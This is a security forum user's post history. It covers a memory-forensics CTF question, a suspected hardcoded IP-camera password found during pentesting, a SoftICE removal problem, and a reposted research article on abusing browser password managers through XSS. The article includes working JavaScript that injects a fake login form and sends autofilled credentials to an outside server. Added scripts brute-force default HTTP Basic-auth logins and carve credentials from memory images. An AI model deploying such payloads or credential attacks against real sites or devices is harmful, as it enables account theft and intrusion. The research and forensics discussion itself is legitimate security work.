Show Posts


Messages - neusbeer

Pages: [1] 2 3 ... 8
Hacking and Security / Re: Where do I find modern techniques?
« on: January 09, 2015, 07:41:49 pm »
You can use Cain & Abel for this (if you are a Windows user).

You can poison DNS, intercept passwords and even brute-force them with it,
catch URLs, etc.

Hacking and Security / Re: help needed for a cyber challenge - level 5
« on: April 21, 2014, 10:49:35 pm »
I can't get it to work; when I add it to VirtualBox it gives errors.
Going to do string searches in the hope of finding something,
and try out The Sleuth Kit.

Hacking and Security / Re: help needed for a cyber challenge - level 5
« on: April 21, 2014, 10:58:52 am »
Yeah, that mail I found, where Pjotr is angry and demanding his money.
Used the same way with Wireshark, but I thought I missed something.

I wasn't 100% complete with the info: they also gave a vmdk file besides the raw mem file.
It's encrypted.

But maybe I need both files to get the answer.

The pcap is just a part of that memdump, so it could be somewhere else in the dump.

Hacking and Security / help needed for a cyber challenge - level 5
« on: April 20, 2014, 12:55:53 pm »
Hey guys,

Can anyone help me with this? I'm busy with a cyber challenge, and working on challenge 5.

Story: Pjotr is communicating with somebody else who calls the shots; Pjotr is a hacker or something.
The challenge is about investigating a murder.

Now in challenge 5 ...
I got a memory dump (Linux), and I have to find
the name of a file (and within that file a username and password) which has been sent
by Pjotr. I found one mail where he's asking about the money after the file transfer 2 weeks ago.

I can't use Volatility, because I'm not sure which Linux rep it is.
I used (in Kali Linux) bulk_extractor and got some info (also a pcap).

But still no clue about the asked file.

Anyone can help? Tips on how to read the raw mem.

NB, it's in Dutch :-)
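The approach the post asks about (reading a raw memory image when no Volatility profile matches), as an added example that is not part of the original thread: a strings-with-offsets pass over the image that picks out mail header lines and key=value credential strings, so a hit like the mail from Pjotr can be carved out by byte offset afterwards. The image, the addresses and the values in it are constructed for this example and are not from the challenge.

```python
"""Strings-with-offsets triage of a raw memory image.

Added example, not from the forum post. Stand-in for a first pass with
`strings`/grep when no Volatility profile matches: every printable run is
reported with its byte offset, mail header lines and key=value credential
strings are picked out, and the bytes around a hit can be carved for a
closer look. SAMPLE_DUMP, the addresses and the values in it are constructed.
"""
import re

# Constructed stand-in for a raw memory dump: filler bytes with a fragment
# of an e-mail and a credential block embedded at arbitrary positions.
SAMPLE_DUMP = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 40
    + b"From: pjotr@example.invalid\r\n"
    + b"To: baas@example.invalid\r\n"
    + b"Subject: geld\r\n\r\n"
    + b"Waar blijft mijn geld? Bestand 2 weken geleden verstuurd.\r\n"
    + b"\xff\xfe" * 30
    + b"user=pjotr\npassword=hunter2\nfilename=geheim.zip\n"
    + b"\x00" * 20
)

MIN_LEN = 6  # shortest printable run to report, like `strings -n 6`

# Header lines a mail client or MTA leaves in memory, and key=value pairs
# worth a second look. Longer alternatives come first so "username" is not
# cut short as "user".
HEADER_RE = re.compile(r"^(From|To|Subject|Date|Message-ID):\s*(.+)$", re.I)
CRED_RE = re.compile(
    r"\b(username|user|password|passwd|pass|filename)\s*[=:]\s*(\S+)", re.I
)


def strings(data, min_len=MIN_LEN):
    """Yield (offset, text) for each run of printable ASCII >= min_len bytes."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield m.start(), m.group().decode("ascii")


def find_mail_headers(data):
    """Return [(offset, header_name, value)] for RFC 822-style header lines."""
    hits = []
    for off, text in strings(data):
        m = HEADER_RE.match(text)
        if m:
            hits.append((off, m.group(1).title(), m.group(2).strip()))
    return hits


def find_credentials(data):
    """Return [(offset, key, value)] for credential-looking key=value strings."""
    hits = []
    for off, text in strings(data):
        m = CRED_RE.search(text)
        if m:
            hits.append((off, m.group(1).lower(), m.group(2)))
    return hits


def carve(data, offset, before=0, after=256):
    """Return the bytes around `offset`, e.g. to pull out a whole message."""
    start = max(0, offset - before)
    return data[start:offset + after]


if __name__ == "__main__":
    for off, name, value in find_mail_headers(SAMPLE_DUMP):
        print(f"0x{off:08x} {name}: {value}")
    for off, key, value in find_credentials(SAMPLE_DUMP):
        print(f"0x{off:08x} {key}={value}")
    first = find_mail_headers(SAMPLE_DUMP)[0][0]
    print(carve(SAMPLE_DUMP, first, after=120))
```

On a real image, read the file in chunks or memory-map it rather than loading it whole, and remember that a page cut across a string boundary splits a run in two; the offsets are what let you go back with a hex editor or `dd` and look at the surrounding page.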


Oef.. pretty nasty bug indeed..
Took 5 sec. to get a session ID from a site and log in.

Hacking and Security / Re: password AfXNtpa38x
« on: February 18, 2014, 07:50:30 pm »
Well it's logical that the IP cams use a default password, like many things such as routers and shit. People just forget or don't care enough, to change that password.

True, but this ain't the standard password; that's admin:admin I think.
Looks more like a vendor password or such.

Hacking and Security / Re: password AfXNtpa38x
« on: February 11, 2014, 11:18:58 pm »
Code:
around 40 yeah, like password, 123456 etc.. ain't that much..
Acunetix uses fast brute-force with a few standard words to speed up
(still slow though..).
I think brand password..

Hacking and Security / Re: password AfXNtpa38x
« on: February 11, 2014, 10:35:32 pm »
But why is it in the wordlist of the Acunetix scanner, which uses a small list of often-used passwords, and also the password of a random cam? How big is the chance?

Hacking and Security / password AfXNtpa38x
« on: February 11, 2014, 08:02:57 pm »
I was busy pentesting IP cams and found a 'strange' thing.
I use noisy scanning with Acunetix (yeah, I'm lazy), and it brute-forces about
40 passwords including this one.
Example log of Acunetix scan:
(see the brute-force part) note, this isn't my log ;)

When testing an IP cam, the actual password of the HTTP Auth was AfXNtpa38x.
Not really a password you see every day, and when I Google it, there aren't many hits (only a leaked pastebin with the same password in it).

Why does this (Dutch) IP cam have this password?

Am I missing something? Is this a standard password for IP cams of this type or some kind of built-in hardcoded password?
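What the Acunetix brute-force step described above does, as an added example that is not part of the original thread: a Python check that tries a short list of credential pairs against an HTTP Basic-auth login, run against a constructed local stand-in for the camera so it works offline. The wordlist, the stand-in's accepted credentials (set to the password named in the post purely for the demonstration, not as a claim about any vendor) and the addresses are assumptions.

```python
"""HTTP Basic-auth default-credential check against a local stand-in target.

Added example, not from the forum thread. The wordlist is a constructed
short list in the spirit of a scanner's default set; the fake camera below
accepts admin:AfXNtpa38x only so the check has something to find.
"""
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import ProxyHandler, Request, build_opener

# Constructed wordlist; the last pair is the password the thread is about.
DEFAULT_CREDS = [
    ("admin", "admin"), ("admin", ""), ("admin", "password"),
    ("admin", "123456"), ("root", "root"), ("admin", "AfXNtpa38x"),
]

# Ignore proxy environment variables so localhost requests go direct.
_opener = build_opener(ProxyHandler({}))


def try_basic_auth(url, user, password, timeout=5):
    """Return True if the server accepts user:password via HTTP Basic auth."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = Request(url, headers={"Authorization": "Basic " + token})
    try:
        with _opener.open(req, timeout=timeout) as resp:
            return resp.status == 200
    except HTTPError as err:
        if err.code in (401, 403):
            return False
        raise  # anything else (500, 404, ...) is not an auth verdict


def check_default_creds(url, creds=DEFAULT_CREDS):
    """Return the first (user, password) pair the target accepts, or None."""
    for user, password in creds:
        if try_basic_auth(url, user, password):
            return (user, password)
    return None


# --- constructed target: a fake camera web UI behind Basic auth -----------
class FakeCamHandler(BaseHTTPRequestHandler):
    VALID = base64.b64encode(b"admin:AfXNtpa38x").decode()  # assumption

    def do_GET(self):
        if self.headers.get("Authorization") == "Basic " + self.VALID:
            self.send_response(200)
            self.send_header("Content-Length", "2")
            self.end_headers()
            self.wfile.write(b"ok")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="ipcam"')
            self.send_header("Content-Length", "0")
            self.end_headers()

    def log_message(self, *args):  # keep the example quiet
        pass


def start_fake_cam():
    """Start the stand-in camera on a free localhost port; return its base URL."""
    srv = HTTPServer(("127.0.0.1", 0), FakeCamHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_port}/"


if __name__ == "__main__":
    base = start_fake_cam()
    print(check_default_creds(base))  # ('admin', 'AfXNtpa38x')
```

The check stops at the first accepted pair and treats only 401/403 as a rejection; a real run against a device also needs a delay between attempts, since some embedded web servers lock out or fall over after a handful of failed logins.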

Reverse Engineering / Re: WinICE problem
« on: May 12, 2012, 02:27:25 pm »
Found it.. pff, took me a few hours.. :P lol

Had to delete registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTICE

Thanks for the link btw.

Reverse Engineering / Re: WinICE problem
« on: May 12, 2012, 02:13:22 pm »
Yeah, but no winice.exe.
Look at the dir structure:

Code:
 Volume in drive C has no label.
 Volume Serial Number is 3807-71C9

 Directory of C:\Program Files\NuMega

12-05-2012  14:12    <DIR>          .
12-05-2012  14:12    <DIR>          ..
12-05-2012  14:12                 0 dirlist.txt
11-05-2012  23:34    <DIR>          SoftIceNT
               1 File(s)                0 bytes

 Directory of C:\Program Files\NuMega\SoftIceNT

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
25-01-2000  04:05             4.237 CommRef.CNT
25-01-2000  04:05           706.560 Commref.hlp
11-05-2012  23:34    <DIR>          Examples
25-01-2000  04:05            81.997 icedat.dll
25-01-2000  04:05           102.462 IcePACK.exe
25-01-2000  04:05           106.556 KD2SYS.exe
25-01-2000  04:05            36.951 KD2SYSXLAT.exe
25-01-2000  04:05             3.692 loader32.cnt
25-01-2000  04:05         1.855.468 loader32.exe
25-01-2000  04:05           109.091 Loader32.hlp
11-05-2012  23:34    <DIR>          Network
25-01-2000  04:05            98.372 nmsym.exe
25-01-2000  04:05           413.766 nmtrans.dll
25-01-1996  16:36                17 ntice.bat
15-11-1996  16:25             7.398 ntice.ico
20-01-2000  16:29            30.788 Readme.htm
25-01-2000  04:05            16.529 Serial.exe
25-01-2000  04:05            73.788 Serial32.exe
11-05-2012  23:34    <DIR>          Setup
11-05-2012  23:44               314 siload.ini
25-01-2000  04:05           114.746 SINet.exe
25-01-2000  04:05         1.681.120 SoftICE Command Reference.pdf
11-05-2012  23:34            76.086 SoftICE.isu
25-01-2000  04:05         2.273.989 Using SoftICE.pdf
11-05-2012  23:34    <DIR>          Util16
20-11-1996  10:34            67.072 Whatsnew.doc
25-01-2000  04:05            12.409 Wldr.hlp
              23 File(s)        7.873.408 bytes

 Directory of C:\Program Files\NuMega\SoftIceNT\Examples

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
11-05-2012  23:34    <DIR>          GDIDemo
               0 File(s)                0 bytes

 Directory of C:\Program Files\NuMega\SoftIceNT\Examples\GDIDemo

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
25-01-2000  04:05            15.020 Bounce.c
25-01-2000  04:05             2.298 Bounce.h
25-01-2000  04:05             8.827 Dialog.c
25-01-2000  04:05             6.853 Draw.c
25-01-2000  04:05             1.369 Draw.h
25-01-2000  04:05             8.869 Gdidemo.c
25-01-2000  04:05               743 Gdidemo.def
25-01-2000  04:05             2.863 Gdidemo.h
25-01-2000  04:05               766 Gdidemo.ico
25-01-2000  04:05             4.222 Gdidemo.rc
25-01-2000  04:05             7.091 Init.c
25-01-2000  04:05             1.636 Makefile
25-01-2000  04:05             4.101 Maze.c
25-01-2000  04:05             1.195 Maze.h
25-01-2000  04:05            12.207 Poly.c
25-01-2000  04:05             2.100 Poly.h
25-01-2000  04:05               116 Readme.txt
25-01-2000  04:05             3.012 Wininfo.c
25-01-2000  04:05             7.396 Xform.c
25-01-2000  04:05             1.262 Xform.h
              20 File(s)           91.946 bytes

 Directory of C:\Program Files\NuMega\SoftIceNT\Network

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
11-05-2012  23:34    <DIR>          3C90X
11-05-2012  23:34    <DIR>          NE2000
               0 File(s)                0 bytes

 Directory of C:\Program Files\NuMega\SoftIceNT\Network\3C90X

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
25-01-2000  04:05            22.542 NETNM3C.inf
25-01-2000  04:05            81.872 NM90XBC4.sys
25-01-2000  04:05            85.080 NM90XBC5.sys
25-01-2000  04:05            95.652 NM90XND4.sys
25-01-2000  04:05            95.092 NM90XND5.sys
25-01-2000  04:05            49.329 OEMSETUP.INF
               6 File(s)          429.567 bytes

 Directory of C:\Program Files\NuMega\SoftIceNT\Network\NE2000

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
25-01-2000  04:05            18.121 NETNMNE.INF
25-01-2000  04:05            18.348 NMNE2K4.sys
25-01-2000  04:05            24.080 NMNE2K5.sys
25-01-2000  04:05            31.202 OEMSETUP.INF
               4 File(s)           91.751 bytes

 Directory of C:\Program Files\NuMega\SoftIceNT\Setup

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
24-01-1996  13:43                11 AUTOEXEC.NT
24-01-1996  13:44                10 CONFIG.NT
25-01-2000  06:18            24.576 sindos.exe
24-06-1997  17:15               545 SINDOSNT.PIF
25-01-2000  06:18            36.864 sinsetup.dll
25-01-2000  06:18            45.056 SiSetup.exe
25-01-2000  06:18            90.112 sividset.dll
25-01-2000  04:05           241.788 siwvid.sys
22-12-1999  11:26            12.662 Vsetup.ini
               9 File(s)          451.624 bytes

 Directory of C:\Program Files\NuMega\SoftIceNT\Util16

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
25-01-2000  04:05           156.160 Dbg2map.exe
25-01-2000  04:05            18.909 Dldr.exe
25-01-2000  04:05             1.763 Dlog.exe
25-01-2000  04:05             4.972 Msym.exe
25-01-2000  04:05             4.111 Util16.txt
25-01-2000  04:05           116.272 Wldr.exe
25-01-2000  04:05            12.409 Wldr.hlp
               7 File(s)          314.596 bytes

     Total Files Listed:
              70 File(s)        9.252.892 bytes
              26 Dir(s)  179.926.364.160 bytes free

Reverse Engineering / Re: WinICE problem
« on: May 12, 2012, 12:37:57 pm »
Hmmm... taking a closer look, it's SoftICE. (Isn't that the same?)

Anyway, I don't have winice.exe.

But ehm, at the beginning of the installation, it asked to change some registry things
(turning debugging on, I think).
Any idea where to search in regedit?

Reverse Engineering / WinICE problem
« on: May 12, 2012, 09:50:33 am »
Not sure where to put this question.

I installed WinICE, but I want to uninstall/deactivate it.
How can I do this?

If I start another program now I get a message that it won't run
because there's a debugger running.
It's in Win XP SP3; where can I find the option to turn this off?

Uninstalling WinICE doesn't work; I still get the same message from the other programs.

Hacking and Security / Re: Abusing Password Managers with XSS
« on: April 26, 2012, 11:05:50 am »
Yep, also it won't work with Opera, since it requires user interaction to fill in the passwords.

Hacking and Security / Abusing Password Managers with XSS
« on: April 26, 2012, 10:41:52 am »
First off, I didn't test it, but I find it a good article.

Abusing Password Managers with XSS
By Ben Toews

One common and effective mitigation against Cross-Site Scripting (XSS) is to set the HTTPOnly flag on session cookies.
This will generally prevent an attacker from stealing users' session cookies with XSS.
There are ways of circumventing this (e.g. the HTTP TRACE method),
but generally speaking, it is fairly effective.
That being said, an attacker can still cause significant damage
without being able to steal the session cookie.

A variety of client-side attacks are possible,
but an attacker is also often able to circumvent Cross-Site Request Forgery (CSRF) protections
via XSS and thereby submit various forms within the application.
The worst case scenario with this type of attack would be that there is no
confirmation for email address or password changes and the attacker can change users' passwords.
From an attacker's perspective this is valuable,
but not as valuable as being able to steal a user's session. By resetting the password,
the attacker is giving away his presence and the extent to
which he is able to masquerade as another user is limited.
While stealing the session cookie may be the most commonly cited method for hijacking user accounts,
other means not involving changing user passwords exist.

All modern browsers come with some functionality to remember user passwords.
Additionally, users will often install third-party applications to manage their passwords for them.
All of these solutions save time for the user and generally help to prevent forgotten passwords.
Third party password managers such as LastPass are also capable of generating strong,
application specific passwords for users and then sending them off to the cloud for storage.
Functionality such as this greatly improves the overall security of the username/password authentication model.
By encouraging and facilitating the use of strong application specific passwords,
users need not be as concerned with unreliable web applications that inadequately protect their data.
For these and other reasons, password managers such as LastPass are generally
considered within the security industry to be a good idea.
I am a long time user of LastPass and have (almost) nothing but praise for their service.

An issue with both in-browser as well as third-party password managers that gets hardly
any attention is how these can be abused by XSS.
Because many of these password managers automatically fill login forms,
an attacker can use JavaScript to read the contents of the form once it has been filled.
The lack of attention this topic receives made me curious to see how exploitable it actually would be.
For the purpose of testing, I built a simple PHP application with a functional
login page as well as a second page that is vulnerable to XSS (find them here).
I then proceeded to experiment with different JavaScript, attempting to steal user
credentials with XSS from the following password managers:

LastPass (Current version as of April 2012)
Chrome (version 17)
Firefox (version 11)
Internet Explorer (version 9)
I first visited my login page and entered my password.
If the password manager asked me if I wanted it to be remembered, I said yes.
I then went to the XSS vulnerable page in my application and experimented with different JavaScript,
attempting to access the credentials stored by the browser or password manager.
I ended up writing some JavaScript that was effective against the password managers listed above with the exception of IE:

Code:
<script type="text/javascript">
    // Filled in once the browser or password manager populates the fake form.
    ex_username = '';
    ex_password = '';
    inter = '';
    function attack(){
        ex_username = document.getElementById('username').value;
        ex_password = document.getElementById('password').value;
        if(ex_username != '' || ex_password != ''){
            // Hide the injected form, ship the values off, stop polling.
            document.getElementById('xss').style.display = 'none';
            request = new XMLHttpRequest();
            // The collecting server's address was stripped from this copy of
            // the post; the string literal below originally held it.
            url = "" + ex_username + "&password=" + ex_password;
            request.open("GET", url, true);
            request.send();
            window.clearInterval(inter);
        }
    }
    // Inject a login form that looks like the real one, so the browser or
    // password manager autofills it on this (XSS-vulnerable) page.
    document.write("\
    <div id='xss'>\
    <form method='post' action='index.php'>\
        username:<input type='text' name='username' id='username' value='' autocomplete='on'>\
        password:<input type='password' name='password' id='password' value='' autocomplete='on'>\
        <input type='submit' name='login' value='Log In'>\
    </form>\
    </div>\
    ");
    // Poll every 100 ms until the fields have been filled in.
    inter = window.setInterval("attack()", 100);
</script>
All that this code does is create a fake login form on the XSS vulnerable page and then wait for it to be filled in by the browser or password manager.
When the fields are filled, the JavaScript takes the values and sends them off to another server via a simple Ajax request.
At first I had attempted to harness the onchange event of the form fields, but it turns out that this is unreliable across browsers
(also, LastPass seems to mangle the form and input field DOM elements for whatever reason).
Using window.setInterval, while less elegant, is more effective.
If you want to try out the above code,
go to and log in (username: user1, password: secret).
Then go to the reflections page and enter the slightly modified code listed there into the text box.
If you told your password manager to remember the password for the site, you should see an alert
box with the credentials you previously entered.
Please let me know if you find any vulns aside from XSS in this app.

To be honest, I was rather surprised that my simple trick worked in Chrome and Firefox.
The LastPass plugin in the Chrome browser operates on the DOM level like any other Chrome plugin,
meaning that it can't bypass event listeners that are watching for form submissions.
The browsers, on the other hand could put garbage into the form elements in the DOM and wait until
after the onsubmit event has fired to put the real credentials into the form.
This might break some web applications that take action based on the onchange event of the form inputs,
but if that is a concern, I am sure that the browsers could somehow fill the form fields without triggering this event.

The reason why this code doesn't work in IE (aside from the non-IE-friendly XHR request)
is that the IE password manager doesn't automatically fill in user credentials.
IE also seems to be the only one of the bunch that ties a set of credentials to a specific page
rather than to an entire domain. While these both may be inconveniences from a usability perspective,
they (inadvertently or otherwise) improve the security of the password manager.

While this is an attack vector that doesn't get much attention, I think that it should.
XSS is a common problem, and developers get an unrealistic sense of security from the HTTPOnly cookie flag.
This flag is largely effective in preventing session hijacking, but user credentials may still be at risk.
While I didn't get a chance to check them out when researching this,
I would not be surprised if Opera and Safari had the same types of behavior.

I would be interested to hear a discussion of possible mitigations for this vulnerability.
If you are a browser or browser-plugin developer or just an ordinary hacker,
leave a comment and let me know what you think.
